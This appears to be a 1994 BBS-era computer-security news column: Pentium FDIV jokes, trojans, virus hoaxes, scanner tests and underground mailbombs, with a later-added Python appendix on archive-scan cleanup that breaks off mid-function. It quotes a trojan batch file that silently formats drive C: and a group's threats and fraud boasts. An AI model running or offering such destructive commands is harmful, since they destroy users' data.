COMPUTER SECURITY
*****************
Compiled, edited & written by Ian Douglas   31/12/94
FidoNet 5:7102/119   TopNet 225:2048/1   InterNet iandoug@cybernet.za
===================================================================

Since this is the festive season I have included some relevant jokes.. :-)

Major story of the month must be the floating point divide bug in Intel's Pentium processor. The error occurs only in certain divisions. Intel put it at around the 9th significant decimal digit in the typical case, but in the worst cases the answer is wrong from the 4th or 5th significant digit: 4195835 / 3145727 comes out as 1.33373... instead of the correct 1.33382.... This is not a problem for most people, unless you are planning your next trip to Mars. Intel knew about the flaw some months ago, but kept silent, and started releasing bug-fixed versions of the chip instead. About 2 million faulty chips were sold. Intel has offered to replace them for anyone who 'shows they have a need for an extremely high degree of accuracy'. All Pentiums shipped before July 1994 had the flaw. A company in the States has released a software fix for the bug. Guess my theory that "computers don't make mistakes" needs a rethink :-)

To make matters worse, there is ANOTHER flaw in the 100MHz (and possibly 90MHz) Pentiums: multi-threading environments such as Windows NT or Unix will not run with the write-back cache enabled in a multi-processor setup. Intel has begun shipping bug-fix versions...

As is usual with major international disasters, the jokes followed immediately...

Q> How many Pentium designers does it take to screw in a light bulb?
A> 1.99904274017, but that's close enough for non-technical people.

Q> What do you get when you cross a Pentium PC with a research grant?
A> A mad scientist.

Q> What's another name for the "Intel Inside" sticker they put on Pentiums?
A> Warning label.

Q> What do you call a series of FDIV instructions on a Pentium?
A> Successive approximations.

Q> Complete the following word analogy: Add is to Subtract as Multiply is to
   1) Divide
   2) ROUND
   3) RANDOM
   4) On a Pentium, all of the above
A> Number 4.
Q> What algorithm did Intel use in the Pentium's floating point divider?
A> "Life is like a box of chocolates." (Source: F. Gump of Intel)

Q> Why didn't Intel call the Pentium the 586?
A> Because they added 486 and 100 on the first Pentium and got 585.999983605.

Q> According to Intel, the Pentium conforms to the IEEE standards 754 and 854 for floating point arithmetic. If you fly in aircraft designed using a Pentium, what is the correct pronunciation of "IEEE"?
A> Aaaaaaaiiiiiiiiieeeeeeeeeeeee!

TOP TEN NEW INTEL SLOGANS FOR THE PENTIUM

9.9999973251  It's a FLAW, Dammit, not a Bug
8.9999163362  It's Close Enough, We Say So
7.9999414610  Nearly 300 Correct Opcodes (you mean, 299.9999831538?)
6.9999831538  You Don't Need to Know What's Inside
5.9999835137  Redefining the PC--and Mathematics As Well
4.9999999021  We Fixed It, Really
3.9998245917  Division Considered Harmful
2.9991523619  Why Do You Think They Call It *Floating* Point?
1.9999103517  We're Looking for a Few Good Flaws
0.9999999998  The Errata Inside

I hear that the Clinton administration is purchasing a few dozen Pentium machines for the project of balancing the budget. With the Pentiums doing the analysis, they just might be able to do it!

With their new Pentium chip, Intel has now attained ISO certification! Announcement said: Intel is now ISO 9000.99736583 certified due to the high quality of the Pentium processor family. Intel CEO commented: Our certification level is close enough to 9001 to satisfy most of our customers.

(Jezebel Valley, California) -- Untel, the world's largest cow chip producer, agreed Monday to provide free replacement for thousands of faulty chips it shipped from its factory to unsuspecting users. The chips contain a design flaw that can make it too brittle to throw. The flaw, known to Untel since last summer's cattle roundup, was publicly described on the Internet just a month ago by Dr. Denim Shirt, a professor at the University of California, Davis. Dr.
Shirt discovered the flaw while doing research for his Bovine Excretia class. He found that under certain repeatable conditions, an Untel chip tossed through the air would fragment, and posted his results as a general query for other chip researchers to look into.

"This could cause untold problems for chip users," said Dr. Shirt. "I was having problems about once every 27 throws."

Untel spin doctors disagreed. "We have threatened our scientists into stating that the real figure is about once every 27 billion throws," said Senior Vice President of Chip Manufacturing Willie-Joe Tucker.

Inter-Bovine Milk, the world's largest milking operation, said it was suspending procurement of Untel chips and offering its customers free replacements with chips that do not contain the flaw. "As the largest bovine operation in the world, we feel we cannot knowingly defraud our customers with this flawed chip," said chairman Larry-Bob "Stonewall" Johnson III.

However, barnyard analysts noted that IBM is marketing a competing chip, called the Power Bovine Chip. IBM denied it was suspending distribution of the Untel chip in order to help sales of the Power BC. "Nothing could be further from the truth," said a snickering Johnson.

Untel denied that it had deliberately withheld the truth about the chip flaw from the public, even while admitting the same. Country spin doctors worked for weeks to try and save the company as much money as possible before being swamped with angry customers, many of whom drove to Untel's main barn in a tractor protest convoy.

"Frankly, we looked at the math of replacing all these chips and, hell, we'd have to cut into our paychecks to do our customers right," said Tucker, angrily spitting out his chew. "And hell, nobody wanted to do that. So we all just went home and sat on it."

Untel unveiled a new policy that will allow "any cowpoke who wants it" to obtain the new chip for free by calling 1-800-COW-CHIP.
Untel also announced that it would pay for the replacement program by taking a charge from its lucrative Flatulence Division, the company's leading-edge publicity subsidiary.

===================================================================

There is a fake version of McAfee's Scan program, called version 119. The scan.exe file is infected with a VCL variant. The virus is detectable and cleanable by Scan v117 (and no doubt other scanners too).

There are also fake trojan versions of the popular Terminate comms program, namely v1.57 and v1.58. Please avoid :-) The current official version is v1.51.

===================================================================

The Black Baron (some of my sources had him down as the Black Knight), writer of the SMEG polymorphic encryption engine, was arrested and will be out of action for a while. However his cronies in the underground (including Talon and Rock Steady) are apparently busy on some new 'killer' viruses. According to one source, anyway.

Another source had this to say: "Would it not be better to refer to Rock Steady as a role model rather than a colleague. I have been led to believe that he (Joe) had stopped writing viruses. I have also been led to believe that he and other members of Nuke were trying to set up a software business. Messages of this kind would be bad publicity for them. If they get themselves too bad a reputation, the general public would not buy their products in case the software contained trojans or droppers. They will have to write ordinary software if they want to make money, it's a bit late in the day to try and compete with Mark Ludwig."

[Mark Ludwig wrote some 'research' viruses a few years ago, and released them into the wild. He also wrote some anti-virus software. He currently produces the 'Forbidden Subjects' CD-ROMs, which contain viruses and other underground stuff.]

===================================================================

The uploads to BBS's of viruses and trojans continues...
There was a file called Speedy.zip, which claimed to speed up your PC. The file is infected with a Jerusalem variant. A KickBoxer game (Kbox20.zip) was also uploaded, which had a trojan in it. Similarly with Techno76.zip, which contained a charming install.bat:

    @echo off
    @echo y |format c: /u >nul
    @echo Fuck you Ryan..... From Satan

which will format your C: drive without any assistance from you: the piped "y" answers FORMAT's "Proceed with Format (Y/N)?" prompt, the /u switch makes it an unconditional format (so UNFORMAT cannot get the data back), and >nul hides the whole thing. The .exe file may also contain a trojan; I have not had an opportunity to check it out yet. It seems to be written in Borland C and also has some text from Clarion database software.

There was also what seems to be a new VCL-generated virus running around. It tries to look like a Carmel Software inoculation routine.

And lastly, the second Honey virus seems to be running around here in Cape Town. It was written by someone calling himself (themselves? itself?) Carnal Cathedral and contains some anti-heuristic tricks to avoid detection. The virus will effectively trash all your drives when it activates, which is when it has infected all the .COM files it can and has ended up in the \DOS directory. (Did I make your day, guys? Now get a life. We can get drivers to find and clean anything you produce, within 24 hours, so stop wasting your and our time.)

===================================================================

The US Customs Commissioner (why him?) issued a warning to parents that child pornographers "are contacting children via computerised bulletin boards." What for? To sell them kiddie porn? While I am fully against kiddie porn, it is unfair to put all BBS's in the same boat.

The British police investigated a chap who was using the internet to distribute kiddie porn. Three systems in North America are also under investigation, as well as systems in Sweden, Switzerland, Holland, Norway, and the UK.
Ian Melamed, who runs BSS, agents for Dr Solomon's (and also wine merchants :-) ), did his own version of a mailbomb, and sent identical letters to several newspapers around South Africa. Quoted without permission:

"YOUNG TUNE IN TO PORN ON PCs
============================

From Ian Melamed, Johannesburg: As a parent I would like to stress my concern about the many young children who tune into bulletin board systems to access pornographic images. While many parents are pleased to see their children spending many hours in computer activity, how many of them realise that their "innocent" offspring may actually be engrossed by pornographic images?

South Africa is part of the technological world, including its vices and its virtues, and bulletin board systems are known to disseminate pornographic images. At least one system in Johannesburg is understood to be used actively by more than 6000 users collecting pornographic images, both still and in motion. It appears that digital images hold far greater fascination for many youngsters than pornographic magazines. Children as young as 10 years old have been known to be hooked on porno images on computers.

Adults and adolescents should be aware that in South Africa it is still an offence to be in possession of pornographic material in any form whatsoever. I suggest parents carry out a review of the files of their adolescents' PCs and explain to them the possible consequences of being caught with undesirable material."

The system he refers to is most likely Digitec, the largest BBS in SA. They were not impressed with the implied allegation, and deny that they have porn available for download. And even if there WAS, I doubt very much if all 6000 users would be there 'collecting pornographic images'... The letter upset many sysops, who felt that they were all being tarred with the same brush.
They also questioned the double standards of allowing the girlie magazines virtually carte blanche, and then complaining about the much tamer pictures on some BBS's. I also feel that we have far more urgent problems to solve in this country and the world in general. For example, in India (and no doubt elsewhere too), there are brothels where girls as young as 10 are employed - the 'problem' of a 10 year old SA kid downloading porn pales in comparison...

Meanwhile, Carnegie-Mellon university in the USA has blocked student access to several internet resources, which it considers pornographic. Presumably alt.sex.binaries.* (or whatever). A research associate was studying pornography in cyberspace, and amassed more than 900 000 pictures, ranging from nudes to bestiality. The university was concerned because scholars in public schools are allowed to use its computer resources.

===================================================================

Just-when-you-thought-it-was-safe-to-go-back-in-the-water department: Philips, Sony, Matsushita (National Panasonic) and JVC are about to dump the current CD-ROM format and switch to a new High Density CD (HDCD) that will allow a full-length broadcast quality movie to fit onto a standard size CD, maybe by 1995. In the meantime, companies in the USA and Pacific Rim are at loggerheads with each other over which technology to use to cram movies onto CD's. The fuss is about which version of MPEG coding to use. Experts predict that by June 1996, your VHS VCR will be passé and replaced by a new-generation CD.

Just when you thought V34 was the ultimate modem standard... five vendors are already busy on specs that will allow you to send voice and data over a 28.8k link, simultaneously. It is known as Digital Simultaneous Voice and Data (DSVD). This could spell the end of all those nifty BBS sysop-chat programs :-). US Robotics say they will have such a modem available by February 1995.
A Toronto, Canada, firm has released a free Windows program that allows anyone with a SoundBlaster card to conduct voice conversations over the InterNet. It is known as InterNet Global Phone (IGP). You need 4MB memory, and a 14.4k or 28.8k SLIP or PPP InterNet connection. Source code is at ftp.mv.com /pub/ddj/. This is likely to kill the IRC...and cause havoc with Telkom's international phone business :-)

And lastly, everyone's favourite arms supplier, Armscor, built some back doors into its world-famous frequency hopper radios. The radios were sold to several countries around the world, including sub-Saharan Africa. The back door allows SA electronic warfare experts to monitor, intercept, or jam, broadcasts from those radios. The policy is standard practice in the arms industry - for example, the French can jam the guidance system of French made missiles if the missiles are used against French interests.

===================================================================

There are trojanized BIOS chips out there... The sticker on the trojanized BIOS chip says:

    AMIBIOS
    AMERICAN MEGATRENDS
    486DX ISA BIOS
    (c) 1993
    AB 3756612

The next three faulty chips (all with Flash) had numbers:

    AB 3756271
    AB 3756631
    AB 3738981

The one that's supposed to be clean is:

    AB 3800510

So it looks as if there are at least 17650 trojanized systems around. The easiest way of identifying the trojan is:

- change the date to the 13th of November (the year doesn't matter)
- reboot the PC

After displaying messages similar to the ones below, you'll hear the tune.

    Cache in 2-Bank!
    33.06x2 MHz CPU Clock
    Intel SL CPU Detected
    (stops and plays here)

The significant ASCII strings inside the BIOS area:

    F000:0060  Date:-04/04/93 (C) 1985-1993,AMI American Megatrends Inc.,All Rights Reserved...
    F000:2DFA  M82C498 Evaluation BIOS v1.55
    F000:8150  486 BIOS 5.00-2.1
    F000:FF59  (C)1992AMI,404-263-8181

===================================================================

There was a hoax 'virus' on the internet, with the following warning being posted in many newsgroups:

"There is a computer virus that is being sent across the Internet. If you receive an e-mail message with the subject line "Good Times", DO NOT read the message, DELETE it immediately. Please read the messages below. Some miscreant is sending e-mail under the title "good times" nation-wide. If you get anything like this, DON'T DOWNLOAD THE FILE! It has a virus that rewrites your hard drive, obliterating anything on it. Please be careful and forward this mail to anyone you care about--I have.

What makes this virus so terrifying, said the FCC, is the fact that no program needs to be exchanged for a new computer to be infected. It can be spread through the existing e-mail systems of the InterNet. Once a computer is infected, one of several things can happen. If the computer contains a hard drive, that will most likely be mostly destroyed. If the program is not stopped, the computer's processor will be placed in an nth-complexity infinite binary loop - which can severely damage the processor if left running that way too long. Unfortunately, most novice computer users will not realize what is happening until it is far too late."

Please note that this alleged virus is impossible: a virus is a program and it MUST be executed to do anything, and merely reading the text of a mail message executes nothing. There are also other give-aways, like saying the hard drive will be destroyed. Not possible with modern hardware. And the bit about 'an nth-complexity infinite binary loop' (whatever THAT is) is pure gobbledygook. Your processor runs at full speed all the time anyway, without suffering damage - it was designed to work like that.

===================================================================

The international virus echos made sporadic appearances this last month.
However the antics of the US underground in dumping mailbombs in those echos led to copycat mailbombs from the SA underground.

"I WONDA WHAT HE'S GONNA SAY ABOUT US... COPYCATTERS?, LAMERS TEENAGERS???, COME ON I DARE YOU TO COME UP WITH A ORIGINAL ONE"

'Copycat' is fine.. and true.. How about 'childish'?

Well, actually, there were at least three pathetic attempts (that I know of) at sending mailbombs, including one to my system. Although a message in the packet claimed that the bombs were aimed at FidoNet, they were sent to the other networks (TopNet, RSANet, etc). On my and another system, the whole lot ended up in bad_messages. On a third system, the sysop ran out of disk space unpacking the bundle, and his system halted. The mail bomb went nowhere. Unfortunately they did succeed on one system, which resulted in some people downloading mail packets in excess of 2MB.. :-( The file I received was about 1.5MB, which unpacked to around 4.5MB. Other systems received bigger packets. The messages were repeated three times in the packet. They were a variety of viruses, explosives recipes, hate mail against me and others who oppose the underground, and assorted articles lifted from US underground filezines.

The mail bomb claims to be from Devastation. They claim that they originated in SWA, and to have disbanded a few months ago. They were apparently upset that someone used their name on a trojan (see last month's column) which was uploaded to a BBS. They thus decided to say 'goodbye' officially, by means of a mailbomb. No, I don't understand that logic. Doubt if anyone can.... But let them introduce themselves, since they are dying for some free publicity... [excuse the French]

OK FOR THOSE TITS THAT RIP US OFF, DISTRIBUTING SHIT UNDER OUR NAME WE'LL INTRODUCE THE MEMBERS OF THE GROUP TO YOUR IDIOTS !!!!

OK FIRST AND FOREMOST. WEHB-WAHLKER : FOUNDER MEMBER AND OUR ANARCHIST. HE HAS A SHORT FUSE SO PLEEZE DON'T PISS HIM OFF. HE IS ALSO A SOLDIER OF FORTUNE SO IF ANY OF YOU GUYZ NEED SOMEONE OR SOMEBODY KILLED, HE IS THE MAN TO SPEAK TO. FOR A PRICE THAT IS.

THE DEVIATOR : CODER, AND CAN'T TAKE THE CREDIT FOR THAT NICE VIRUS THAT PORKY GOT. BUT I GUESS IT'S NOT OUTA OUR REACH. WE USUALLY TAKE THE DIRECT ROUTE UPLOAD A NICE TROJAN THAT DEMOLISHES THE HD. WE ALSO DON'T TAKE DOWN PUNY SHIT LIKE PIGS COMPUTERS BTW, ANTHONY HOW MUCH IS THE BET THAT I COULD CRASH DIGITEC?, TAKE IT OFF FOR GOOD, OR AT LEAST A MONTH OR TWO..

FRY GUY : FOUNDING MEMBER. HE IS IN CHARGE OF PHREAKING AND GETS US ALL THOSE NICE FREE!!! CALLS FROM NAMIBIA. HE HACKED THE NICE PBX ALSO KNOWS HOW TO GET US SOME OTHER TOTALLY PHREE CALLS.

CANDYMAN : FOUNDING MEMBER. HE DOES PUBLIC RELATIONS, WHICH INCLUDES OCCULT AND CORRUPTING THE YOUTH. HE ALSO DOES SOME OTHER MISC STUFF FOR US LIKE ART, MUSIC CARDING AND OTHER SMALL SHIT.

BLACK WIDOW : MOST RECENT ADDITION TO DEVASTATION AND IS MAINLY RESPONSIBLE FOR CODING AND CRACKING.

(The original is written in the underground's 'special character' font: there is a program that takes normal ASCII text and converts it to those characters. It is transcribed back to plain ASCII here.)

Speaking of the underground, it seems that the various underground/cracking/demo/etc groups don't like each other very much, and fight like cat and dog... well, that is the impression I am getting from my various conversations.. :-)

===================================================================

Still on the underground: last month's mention of their activities, and particularly the list of BBS's that I mentioned, had some interesting repercussions... These ranged from irate users and sysops to threats of legal action against me.. To set the record straight, let me first quote what I said:

"The 'underground' Bulletin Board scene is alive and well in South Africa. They even have their own 'filezine' modelled on RobList.
A recent issue of their filezine, The Hacker BBS List of RSA, listed the following systems: Warlocks, Dwayne's World, HAi World HQ BBS, The Bird's Nest, Rebel, Pandion's, Toxic Shade II, Ace of Base, The Lair, Haids, Virus Polytechnics. Several of these systems claim to be support sites for H/P/A/C/V. That means they offer files and messages about Hacking, Phreaking, Anarchy, Credit Cards, and Viruses."

All the text above is true. HOWEVER THAT DOES NOT IMPLY THAT THOSE BBS'S LISTED ABOVE ARE IN FACT UNDERGROUND BBS's. THE HACKER BBS LIST IS WRONG.

In fact, David Storer, sysop of HAi, told me he tried in vain to get his name removed from the list. He is also fed up that since last month he has been plagued by new callers asking for access to his virus areas, which don't exist.

The reason I posted the list was to highlight the unreliability of much of the info available from the underground. If you see a BBS listed as underground, when you know darn well that it is not, then you can draw your own conclusions about the publishers of HBBS. In fact it would not surprise me in the least if my system was suddenly listed in HBBS.... At least another two of those BBS's listed are closed, and another is there merely because the sysop cracked the HBBS program (it is password protected).

===================================================================

While we here in SA ponder how to legislate against computer crime, the Yanks have made some progress:

"The Clinton Crime Bill makes it illegal to transmit computer viruses and worms over the nation's electronic networks. The law also introduces two levels of computer crime: those taken with "reckless disregard" are misdemeanors, while "intentional" acts are felonies. Other sections of the crime bill prohibit state motor vehicle agencies from selling personal information from their databases. (Computerworld. Oct. 10, 1994.
pg 65)"

===================================================================

ThunderByte scanner is still giving false alarms on certain non-executable files, claiming they are infected with Satan_Bug. For example:

    TbScan report, 12-06-1994 22:31:13
    C:\TEMP\MAPICONS.SPR   infected by Satanbug virus
    C:\TEMP\FONT2.SPR      infected by Satanbug virus

These files are safe. I have complained to Frans Veldman about his algorithm, but he has not fixed it yet. Note that using heuristic analysis on non-executables IS asking for confusion :-)

===================================================================

The gentlemen from Devastation took the liberty of adding comments to one of my columns...

> The other major story this month came from your favourite telecoms
> supplier, Telkom. They made threatening noises about enforcing an
> outdated 1958 law regarding so-called "3rd party traffic". This is
> electronic communications from A to C, via B. All the amateur
> networks like FidoNet, RsaNet, ILink, TopNet, etc, and the
> commercial internet service providers, use this method of sending
> mail around. In terms of the law, it is actually illegal. FidoNet
> has special permission to move mail around, the others do not.

NAUGHTY, NAUGHTY!!!, YOU'LL BE KILLED.. DON'T WORRY WE'RE GETTING THEM BACK FOR YA,.. WE'RE MAKING AT LEAST 5 TO 30 GRANDS WORTH OF CALLS A MONTH ON THEIR ACCOUNT <eg>

> There is a pest active in the Durban area, who is uploading viruses
> to BBS's in the Durban area. During this month, he uploaded 3
> different overwriting viruses to a BBS. The filenames were

HEAVEN FORBID!!!!. I'VE UPLOADED AT LEAST 20 TO DIGITEC SO FAR

> The uploader, known as Warlord of Hell (see last month's article) is
> suspected of also running a BBS. His name is known to me, and further
> action is pending...

OH NO,.. IF YOU GET IN SHIT CONTACT US WE KNOW A FEW CROOKED LAWYERS JUDGES/POLICE MEN/ YOU NAME IT, WE'LL TRY TO HELP YA

(Their comments were in the same 'special character' font as the mailbomb above, and are transcribed back to plain ASCII here.)

===================================================================

For those of you into CD-ROMs, a warning message:

------------------------------------------------------------------------
Date: 12-16-94              Msg # 98
To:   ALL                   Conf: (125) Virus'-WN
From: ROBERT KEMPER         Stat: Public
Subj: WARNING WARNING WARNING   Read: Yes
------------------------------------------------------------------------

I discovered a Trojan on the Software Vault Gold Collection CD. Under the utilities section is a supposedly shareware virus scanner that will damage any disk you attempt to scan. The file name is SCCL100.zip DO NOT ATTEMPT TO RUN THIS PROGRAM !

I have notified American Databankers Corp and they have confirmed that this program is designed to damage disks and will be removed from future CD's. We found this program on 8 CDs total in our area and made the proper notifications to the sysops. Here they are the CDs and the areas the program was found in:

    CD Title                    Area
    -------------------------------------------------------------------
    Shareware Vault Gold        Virus Detection and Prevention
    Shareware Studio #4         Virus
    Tech Arsenal
    Cream of the Crop II        Virus Prevention
    Hobbes OS/2                 MAC File Viewers
    Best of Bizzness '94        Virus Utilities
    Best of Shareware '94       MAC File Viewers
    Night Owl #9                Virus

The file is 709180 Bytes with a file date of 05-26-93.

This program claims to be a *virus scanner*. The program will start out asking you what drive you want to scan. Upon entering a drive letter you are immediately taken to a screen where the alleged scanning is taking place. The unsuspecting victim will observe a Scanning box and a Status box on the screen. As the Scanning box fills ( Showing the percentage of the disk that is scanned ) the status box shows the message : "Scanning Memory ...." Once the Scanning box reaches 100%, the status box then reports "Memory appears to be clean ....".
Now the program performs the alleged disk check. The Scanning box once again will display the percentage of the disk being scanned and the status box displays the following message: " Now performing check on disk.... Please Wait ...."

Now the fun begins. The Scanning box will go the screen's width several times and then stop. The Status box displays the following message: " Uh Oh....Virus Detected...." Upon hitting the return button this message comes up: " Trying to gain control of vital areas...." After a few seconds the final message comes up as: " Cannot destroy virus !!!!" The system is waiting for a RETURN from the user. The light on the A: drive goes on and the damage is now in progress. After the drive stops, the system is locked up. The system needs to be rebooted again. After rebooting, the unsuspecting user then looks at the disk in the A: drive to see if the "virus" has been removed only to find the disk deleted and unformatted.

===================================================================

Date: Tue, 20 Dec 94 15:08:08 WET
From: Fridrik Skulason
Subject: mass-distribution of infected diskettes...

I just received information on two incidents of distribution of infected diskettes.

From: Mikko Hypponen

We received an unconfirmed report of another batch of infected 3.5" HD floppies. This time they were coming from Germany, and had a file called DE.EXE on them (!). This file was reportedly infected by Mange-Tout.1099. As far as we know, Mange-Tout.1099 was spread from Hong Kong to west on some video driver diskettes earlier this year.

--------

The other incident is reported to include 10-20 000 Galicia-infected diskettes that have just been shipped all over Europe...exact details are not yet available.
-frisk

===================================================================

Subject: Infection with Natas4744/4746 via free disk (PC)
Date: 16 Dec 1994 13:00:49 -0000

Amsterdam, 29 November 1994
Re: Natas 4744/4746 on free PCM-distributed disk

Hello,

Yesterday afternoon we discovered the virus Natas 4744/4746 on several of our computers. It was diagnosed and removed with the virus scanner F-PROT 2.15 (created 10 November 1994). The virus arrived with a free disk distributed by the Dutch computer magazine Personal Computer Magazine, containing Euromark, VNU European lab's computer test suite.

===================================================================

Subject: NATAS Alert! (PC)
Date: 16 Dec 1994 13:00:51 -0000

This was emailed today (11/30/94) to everyone in my office:

At First Saturday Sale in downtown Dallas, there was a vendor handing out floppy disks to demo his services. Unknown to the vendor these disks were infected with the Natas Virus (in the INSTALL.EXE file.) This is a fairly nasty polymorphic virus that *can* trash your hard drive. It does varying degrees of damage, with a complete crash in roughly 1 out of 500 hard drives. The demo program was only completed 4 days ago, but SO FAR, there have been 3 crashed systems and one infected network. With several hundred additional demo disks now in circulation.... the potential is pretty scary.

The free demo disks were 3.5" black floppies with the word "WIN" in large letters from Winner's International Network. Please pass this message around, this could be a nasty problem. The vendor has handed out over TWO THOUSAND disks total, and the virus is probably wide spread in the DFW community by now.

===================================================================

There was a report on the radio about a man in Florida (IIRC) who bought 20 second hand floppies in a junk shop, for $4.
When he got home, he had a look at what was on them - and was horrified to find that they were filled with detailed medical records from a local hospital. The information was highly personal, including details of sexual operations and problems. The hospital has launched an investigation as to how the disks ended up in the shop.... Do you know where YOUR medical records are? :-)

===================================================================

From: ANTHONY APPLEYARD
Subject: New virus reported in China: `Li Peng' (PC)
Date: 20 Dec 1994 13:03:42 -0000

In 5 Dec 1994 issue of the Daily Telegraph (UK newspaper), p23:-

A new virus doing the rounds in China is perplexing the party faithful. When it strikes, a question appears on the screen: "Do you think Li Peng is a good prime minister?". If the operator answers "no", then the message disappears and the system is left untouched. On the answer "yes", however, the virus wipes the entire hard disk.

===================================================================

From: an448@freenet.carleton.ca (Yves Bellefeuille)
Subject: Bug report: NAV 3.0 (PC)
Date: 20 Dec 1994 13:37:01 -0000

Bug report: Using Norton Anti-Virus 3.0 to scan a directory or your entire disk may cause files to be improperly deleted. This bug seems to appear in the following circumstances:

- NAV is set to scan "Within Compressed Files" (in the Tools menu, under Options);
- temporary files are redirected to a RAM drive; and
- a directory contains both a PKZip archive and the (unzipped) files it contains, i.e. the zipped files were extracted to the same directory as the archive.

NAV apparently scans the zipped files by extracting them to a RAM drive, scanning them, and then deleting them. Using a RAM drive speeds up the procedure, even when using a cache.
NAV apparently gets confused if the PKZip archive is in the same directory as the unzipped files: it sometimes deletes not only the files it has just extracted to the RAM drive but also the unzipped files on the hard drive.

I can consistently reproduce this bug by scanning the shareware program Top Draw v2.0 (30 June 1994) by Top Draw Software. Interestingly, the bug seems to depend on the size of the RAM drive. With a 768-byte RAM drive, the file TOPDRAW.EXE is deleted. With a 512-byte RAM drive, the files TOPDRAW.EXE and TOPDRAW.HLP are deleted.

I should emphasize that NAV does not report that these files are infected or suspicious, nor have I configured NAV to automatically delete suspicious files.

I'm using MS-DOS 6.2 and Norton Anti-Virus 3.0 with a patch dated 23 June 1994 and the latest virus definition files (December 1994). I'm scanning under DOS, not in Windows.

===================================================================

From: jmward@cs.UCR.EDU (jonathan ward)
Subject: Re: Virus in gifs, jpegs?
Date: 23 Dec 1994 11:08:43 -0000

Dana R. Billig wrote:

>Just a question.
> In one of the other newsgroups, someone posted a message to warn
>of a virus which he called the VD virus. The poster, who did it
>anonymously, claimed that the virus is encoded into gifs, jpegs and other
>graphics files. Supposedly when the skin tone color is 30% or greater,
>"it goes to work on your hard drive."
>
>[Moderator's note: Sounds like a hoax to me...]
>
> I did not think this was possible. If anyone knows otherwise,
>or has heard of this virus, please post, or email me with any info.
>This is all the information that I have about it.

I would tend to agree with you and the Moderator. Graphics files are usually data files, in which case a virus, while possibly embedded in the data, will NOT infect your computer. A virus must be run to work, and graphics files are not run.
The most that something like that will do is screw up how the image looks when it is displayed, due to bogus data.

===================================================================

Current versions of popular AV software in SA:

McAfee: v2.1.3e
F-Prot: v2.15
TBAV:   v6.30
AVP:    21b-b

Oliver Steudler of Dynamic Solutions reports that Exebug is 'rampant', and he also had reports of Michelangelo and Jerusalem. The BSS helpline in Cape Town is closed for the festive season.

Mitch Dove of Gas Software, Jhb, reports recent cases of Shoo.2824.A, Michelangelo, Stoned, and Quiet.

Scanner tests:

A test of anti-virus TSRs by the University of Tampere Virus Test Center earlier this year:

Product                                   Infected files detected   Percentage
Virus Guard (Anti-Virus Toolkit v.6.51)   2915 of 3024              96,4 %
TbscanX (Thunderbyte v.6.11)              2600 of 3024              86,0 %
Virstop (F-Prot Professional v.2.11a)     2573 of 3024              85,1 %
NavTSR (Norton Anti-Virus v.3.0)          2350 of 3024              77,8 %
Vshield (McAfee Scan 9.24 v 113)          1741 of 3024              57,6 %
Vsafe (Central Point Anti-Virus v.2.0)    1651 of 3024              54,6 %

Patricia Hoffman's VSUM test, November 1994. Note the version numbers and the "1st Cert" column, which gives the VSUM library version at which each product was first certified (a product tested against an older library faces a smaller sample). Also note that there are now over 5000 viruses known.

VSUM Virus Library Version: X411   Date: Nov 30, 1994
Total Viruses: 2,806   File Viruses: 2,715   Boot Viruses: 91

Product Name & Version                  1st Cert   Total   Boot   File   Tot %
-----------------------------------------------------------------------------
DOS Based Scanning Products:
Command Software's F-Prot
  Professional 2.13                     X406       2,688     89   2,599   95.8
Dr. Solomon's AVTK 6.69                 X411       2,704     89   2,615   96.4
IBM Anti-Virus/DOS 1.07E                X411       2,586     90   2,496   92.2
McAfee Assoc ViruScan 2.1.3             X411       2,737     91   2,646   97.5
Norton Anti-Virus 3.0 9411 Upd          X411       2,144     85   2,059   76.4
Sophos' Sweep 2.67                      X411       2,694     86   2,608   96.0

(Total = Boot + File; Tot % is Total as a fraction of the 2,806 viruses in library X411.)

===================================================================

And lastly, some new viruses have been discovered...

The Government of National Unity Virus: your PC locks up, the screen splits randomly, with each section blaming the other section. Keeps demanding more money...

The Van Zyl Slabbert Virus: it would make a great virus, but it won't run...

The Jan Smuts Virus: you are in Johannesburg, your luggage is in Taiwan.

The Springbok Cricket Virus: makes your 486 work like a 286.

Inkatha Virus: feels threatened by other files on your HD and erases them in self defence.

Minibus Taxi Virus: zips around all over your HD at great speed, alternately deleting or compressing files at random. Can apparently squeeze 5 MB into 5 kB...

===================================================================

fin (whew!) wipes brow..
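Appendix: a worked example for the NAV 3.0 bug report above. This is added here by the editor; it is not Symantec's code and not Yves Bellefeuille's, and since the report does not say why NAV deletes the user's files it makes no claim about NAV's internals. It shows one way the "extract to a scratch area, scan, delete" step of an archive scanner can destroy the user's own unzipped copies (cleaning up by member name resolved against the archive's directory), beside the pattern that avoids it (a private temporary directory that is removed as a whole, with member names checked for '../' traversal). The file names and contents are constructed stand-ins, and the "detector" matches a made-up marker string rather than any real signature.

```python
"""Scan-time archive extraction that cannot clobber the user's own files.

Added example: not Symantec/Norton code, and not a claim about why NAV 3.0
fails. It models one way this class of bug arises (cleaning up extracted
members by name against the wrong directory) beside the pattern that avoids
it (a private temp directory removed as a whole, member names checked for
'../' traversal). Files are constructed stand-ins; the 'detector' matches a
made-up marker string, not any real signature.
"""
import tempfile
import zipfile
from pathlib import Path

MARKER = b"CONSTRUCTED-SAMPLE-MARKER"
# Stand-ins for the TOPDRAW.EXE / TOPDRAW.HLP pair in the report, plus one
# member that carries the made-up marker so a detection shows up.
SAMPLE_MEMBERS = {
    "TOPDRAW.EXE": b"MZ\x90\x00 harmless stand-in",
    "TOPDRAW.HLP": b"help text",
    "DEMO.COM": b"\xeb\xfe" + MARKER,
}

def make_fixture(root: Path) -> Path:
    """Write <root>/TOPDRAW.ZIP and the same files unzipped beside it."""
    archive = root / "TOPDRAW.ZIP"
    with zipfile.ZipFile(archive, "w") as zf:
        for name, data in SAMPLE_MEMBERS.items():
            zf.writestr(name, data)
            (root / name).write_bytes(data)  # the user's own extracted copy
    return archive

def scan_bytes(data: bytes) -> bool:
    """Placeholder detector: True if the constructed marker is present."""
    return MARKER in data

def scan_archive_naive(archive: Path, work_dir: Path) -> list:
    """Buggy pattern: members go to work_dir (the 'RAM drive'), but cleanup
    resolves each member NAME against the archive's directory. A user who
    keeps the unzipped files beside the archive loses them, silently."""
    infected = []
    with zipfile.ZipFile(archive) as zf:
        zf.extractall(work_dir)
        for name in zf.namelist():
            if scan_bytes((work_dir / name).read_bytes()):
                infected.append(name)
            stale = archive.parent / name  # wrong base directory
            if stale.exists():
                stale.unlink()
    return infected

def scan_archive_safe(archive: Path) -> list:
    """Correct pattern: write each member under a fresh private temp dir and
    remove only that dir afterwards, so the archive's directory is never
    touched; resolve and check names so a '../' entry cannot escape."""
    infected = []
    with tempfile.TemporaryDirectory(prefix="avscan-") as tmp:
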